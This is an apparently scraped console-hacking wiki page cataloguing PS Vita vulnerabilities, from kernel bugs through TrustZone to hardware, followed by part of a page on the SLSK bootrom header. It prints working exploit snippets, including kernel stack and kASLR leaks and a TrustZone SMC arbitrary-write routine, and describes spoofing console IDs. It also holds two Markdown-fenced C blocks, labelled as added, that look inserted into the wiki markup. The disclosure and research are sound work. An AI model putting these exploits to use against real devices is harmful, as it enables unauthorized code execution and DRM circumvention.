Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
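As an added illustration of both defects above (a toy model written for this entry, not code from h-encore or from the Vita's memcpy), the C below shows the wrapping length check, the signed loop compare, and a hardened form that rejects the oversized request; the 64-byte buffers and helper names are assumptions for the demo.<br />

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Toy model of the two memcpy defects described above (constructed for this
 * wiki entry; not the real implementation). The 32-byte "small copy"
 * threshold follows the text; buffer sizes and names are assumptions. */

#define SMALL_COPY_LIMIT 32

/* First defect: the routine chooses the "small" path by comparing dst + len
 * against dst + 32. For negative len the addition wraps, dst + len lands
 * below dst, and the comparison is false under signed and unsigned
 * interpretation alike. Returns 1 when the small-copy path would be taken. */
int buggy_takes_small_path(uintptr_t dst, int len)
{
    uintptr_t end = dst + (uintptr_t)len;        /* wraps when len < 0 */
    uintptr_t big = dst + SMALL_COPY_LIMIT;
    return !(end >= big);
}

/* Second defect: the loop counter is compared against the length as a
 * signed integer, so a negative len never enters the loop and the routine
 * returns without copying. Returns the number of bytes written. */
size_t buggy_copy_loop(unsigned char *dst, const unsigned char *src, int len)
{
    int i;
    for (i = 0; i < len; i++)                    /* signed compare */
        dst[i] = src[i];
    return (size_t)i;
}

/* Hardened form: the length is unsigned and is checked against the room
 * actually available before any pointer arithmetic, so a "negative" length
 * arrives as a huge size_t and is rejected instead of wrapping. */
int safe_copy(unsigned char *dst, size_t dst_room,
              const unsigned char *src, size_t src_room, size_t len)
{
    if (len > dst_room || len > src_room)
        return -1;
    memcpy(dst, src, len);
    return 0;
}

/* Demo wrappers over constructed 64-byte buffers, checkable by return value. */
int demo_buggy_bytes_copied(int len)
{
    unsigned char src[64], dst[64];
    memset(src, 0x41, sizeof src);
    memset(dst, 0, sizeof dst);
    if (len > (int)sizeof src) return -1;        /* keep the demo in bounds */
    return (int)buggy_copy_loop(dst, src, len);
}

int demo_safe_copy_result(int len)
{
    unsigned char src[64], dst[64];
    memset(src, 0x41, sizeof src);
    return safe_copy(dst, sizeof dst, src, sizeof src, (size_t)len);
}

int main(void)
{
    printf("len=-1: small path=%d, buggy loop copied=%d, safe_copy=%d\n",
           buggy_takes_small_path(0x1000, -1),
           demo_buggy_bytes_copied(-1), demo_safe_copy_result(-1));
    printf("len=16: small path=%d, buggy loop copied=%d, safe_copy=%d\n",
           buggy_takes_small_path(0x1000, 16),
           demo_buggy_bytes_copied(16), demo_safe_copy_result(16));
    return 0;
}
```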
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovered a buffer overflow in NSBL that occurs during eMMC initialization: the eMMC MBR can be modified to change the block size. Yifan tried to exploit it with an adjacent malloc(controlled_size), could not find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx found a way to exploit the buffer overflow. He discovered a logic flaw related to error code propagation in NSBL: a function does not check an error return. If it did, the value corrupted by the buffer overflow would not have been used; later on, the field that was written is used in a separate call.<br />
<br />
This allows a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere after 1.80 and before 2.10.<br />
<br />
A list of the imports/exports of the 1.80 TrustZone modules is available [https://pastebin.com/59pe8jBg here].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
Fixed in firmware 1.80<br />
<br />
(2017-02-18) To be disclosed.<br />
<br />
(2018-12-29) Disclosed at 35C3<br />
<br />
https://twitter.com/pomfpomfpomf3/status/832806488221446145<br />
<br />
<pre><br />
octopus exploit<br />
<br />
.---. ,,<br />
,, / \ ;,,'<br />
;, ; ( o o ) ; ;<br />
;,';,,, \ \/ / ,; ;<br />
,,, ;,,,,;;,` '-,;'''',,,'<br />
;,, ;,, ,,,, ,; ,,,'';;,,;''';<br />
;,,,; ~~' '';,,''',,;'''' <br />
</pre><br />
<br />
(I copied the octopus from an ASCII art page: http://ascii.co.uk/art/octopus)<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=10540SLSK2019-02-02T20:15:27Z<p>Xyz: </p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
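As an added example (written for this page, not the wiki's own code nor a Vita tool), a C parser for the header laid out in the table above; it assumes little-endian fields, assumes "Until Data" means the encrypted header runs up to the offset given by the offset-to-code field, and builds its own constructed sample headers for both the 0.931 and the later layout.<br />

```c
#include <stdint.h>
#include <string.h>

#define SLSK_MAGIC 0x64B2C8E5u

/* Parsed view of the plaintext SLSK header laid out in the table. */
typedef struct {
    uint32_t code_offset;
    uint32_t version_str_size;   /* 0 on 0.931, 0x10 otherwise */
    uint32_t unknown_block_size; /* only ever seen as 0 */
    uint32_t code_size;
    uint16_t aes_key_revision;   /* 0..5 */
    uint16_t pub_key_revision;   /* 0..15 */
    uint8_t  body_sha256[32];    /* sha256 of the decrypted body */
    char     version[17];        /* ASCII version, empty on 0.931 */
    uint32_t enc_header_offset;  /* 0xE0, or 0xD0 when no version string */
    uint32_t enc_header_size;    /* up to the offset-to-code field (assumption) */
} slsk_header;

/* Field access; assumes little-endian encoding. */
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Returns 0 on success or a negative code naming the check that failed. */
int parse_slsk_header(const uint8_t *buf, size_t len, slsk_header *h)
{
    if (len < 0x40) return -1;                 /* fixed part truncated */
    if (rd32(buf) != SLSK_MAGIC) return -2;
    memset(h, 0, sizeof *h);
    h->code_offset        = rd32(buf + 0x04);
    h->version_str_size   = rd32(buf + 0x08);
    h->unknown_block_size = rd32(buf + 0x0C);
    h->code_size          = rd32(buf + 0x10);
    h->aes_key_revision   = rd16(buf + 0x14);
    h->pub_key_revision   = rd16(buf + 0x16);
    memcpy(h->body_sha256, buf + 0x20, 32);
    if (h->version_str_size != 0 && h->version_str_size != 0x10) return -3;
    if (h->aes_key_revision > 5)  return -4;
    if (h->pub_key_revision > 15) return -5;
    /* The 0x90-byte zero block and the encrypted header follow the optional
     * version string, which is why a 0.931 header sits 0x10 bytes earlier. */
    h->enc_header_offset = 0x40 + h->version_str_size + 0x90;
    if (len < h->enc_header_offset) return -6;
    if (h->version_str_size) memcpy(h->version, buf + 0x40, 0x10);
    for (size_t i = 0x40 + h->version_str_size; i < h->enc_header_offset; i++)
        if (buf[i] != 0) return -7;            /* zero block is not zero */
    if (h->code_offset < h->enc_header_offset || h->code_offset > len) return -8;
    h->enc_header_size = h->code_offset - h->enc_header_offset;
    return 0;
}

/* Writes a constructed sample (not a real SLSK) into buf: post-0.931 layout
 * when has_version is set, 0.931 layout otherwise. Returns bytes written. */
size_t build_sample_slsk(uint8_t *buf, size_t cap, int has_version)
{
    uint32_t vs = has_version ? 0x10 : 0;
    uint32_t enc_off = 0x40 + vs + 0x90;
    uint32_t code_off = enc_off + 0x2C0;       /* constructed enc header size */
    uint32_t total = code_off + 0x100;         /* constructed code size */
    if (cap < total) return 0;
    memset(buf, 0, total);
    wr32(buf + 0x00, SLSK_MAGIC);
    wr32(buf + 0x04, code_off);
    wr32(buf + 0x08, vs);
    wr32(buf + 0x10, 0x100);
    wr16(buf + 0x14, 2);                        /* AES key revision */
    wr16(buf + 0x16, 7);                        /* public key revision */
    memset(buf + 0x20, 0xAB, 32);               /* placeholder hash bytes */
    if (has_version) memcpy(buf + 0x40, "sample-ver\0\0\0\0\0\0", 0x10);
    memset(buf + enc_off, 0xCD, code_off - enc_off); /* opaque header bytes */
    memset(buf + code_off, 0xEF, 0x100);        /* opaque code bytes */
    return total;
}

/* Demo: encrypted-header offset the parser derives for each layout. */
int demo_enc_header_offset(int has_version)
{
    uint8_t buf[0x1000]; slsk_header h;
    size_t n = build_sample_slsk(buf, sizeof buf, has_version);
    if (n == 0 || parse_slsk_header(buf, n, &h) != 0) return -1;
    return (int)h.enc_header_offset;
}

/* Demo: parser result after one constructed corruption (0 none, 1 bad
 * magic, 2 odd version-string size, 3 AES key revision out of range). */
int demo_parse_result(int corruption)
{
    uint8_t buf[0x1000]; slsk_header h;
    size_t n = build_sample_slsk(buf, sizeof buf, 1);
    if (corruption == 1) wr32(buf + 0x00, 0x12345678);
    if (corruption == 2) wr32(buf + 0x08, 0x20);
    if (corruption == 3) wr16(buf + 0x14, 6);
    return parse_slsk_header(buf, n, &h);
}
```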
<br />
== Trailer ==<br />
<br />
The last 0x340 bytes of each SLSK are not personalized and are not used in any way.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Secret debug mode ===<br />
<br />
Before the ENC is loaded, there is a check for a secret mode. It uses two GPIO ports that are normally part of the SPI-like protocol used for regular syscon communications, where they serve for signaling. However, the bootrom does not use the SPI registers at all; it uses registers that are never seen outside of the bootrom. Even though this interface is logically separate from the SPI ports, it could be physically connected to the same pins, although this is unconfirmed. Note that when the secret handshake passes and the console is in secret mode, the MBR is read from the game card instead (with game card authentication not enabled, so a regular SD card would work). Additionally, the personalization removal is done using keyslot 0x207 instead of 0x206 (see below), although it is not currently known whether 0x207 is console-unique. All the signature checks and the HMAC are still performed, so this secret mode cannot be used for running unsigned code. However, [[Glitching]] would still work in the secret debug mode.<br />
<br />
<source lang="c"><br />
int is_debug_mode(void) {<br />
int res = 0;<br />
gpio_set_port_mode(0, 3, GPIO_MODE_OUT);<br />
if (gpio_port_read(0, 4)) {<br />
// this sets a bit in some f00d-only hardware<br />
// note this same reg is used to enable f00d reset from arm<br />
*(uint32_t *)0xE0020000 |= 0x10;<br />
// theory: mux on syscon SPI ports to connect to f00d directly<br />
<br />
// compute a challenge using true random numbers<br />
uint32_t challenge[4];<br />
challenge[0] = trng_read32();<br />
challenge[1] = trng_read32();<br />
challenge[2] = challenge[0];<br />
challenge[3] = challenge[1];<br />
<br />
// send challenge<br />
*(uint32_t *)0xE0000020 = challenge[0];<br />
*(uint32_t *)0xE0000024 = challenge[1];<br />
gpio_port_set(0, 3);<br />
<br />
// poll<br />
while (!gpio_port_read(0, 4));<br />
<br />
// get response<br />
uint32_t response[2];<br />
response[0] = *(uint32_t *)0xE0000028;<br />
response[1] = *(uint32_t *)0xE000002C;<br />
<br />
// clear regs<br />
*(uint32_t *)0xE0000028 = -1;<br />
*(uint32_t *)0xE000002C = -1;<br />
*(uint32_t *)0xE0000060 = -1; // maybe cached of 0xE0000020?<br />
*(uint32_t *)0xE0000064 = -1; // maybe cached of 0xE0000024?<br />
<br />
// end handshake<br />
gpio_port_clear(0, 3);<br />
<br />
// compute expected result<br />
uint32_t expected[4];<br />
if (bigmac_aes256_ecb_encrypt(expected, challenge, sizeof(challenge), g_debug_challenge_key) == 0) {<br />
// check result<br />
if (memcmp_timingsafe(expected, response, 8) == 0) {<br />
res = 1;<br />
}<br />
}<br />
memset(g_debug_challenge_key, 0, sizeof(g_debug_challenge_key));<br />
memset(challenge, 0, sizeof(challenge));<br />
memset(response, 0, sizeof(response));<br />
memset(expected, 0, sizeof(expected));<br />
} else {<br />
memset(g_debug_challenge_key, 0, sizeof(g_debug_challenge_key));<br />
}<br />
return res;<br />
}<br />
</source><br />
<br />
=== Remove personalization ===<br />
<br />
First, the personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there is no plaintext version string) for a size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There is however an alternative path, triggered in secret debug mode, where keyslot 0x207 is used instead with a different seed.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206 and 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 still allows encryption; this lets the update manager SM add the personalization layer during an update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over the enc header, excluding the RSA signature (typically 0x00 to 0x1C0).<br />
<br />
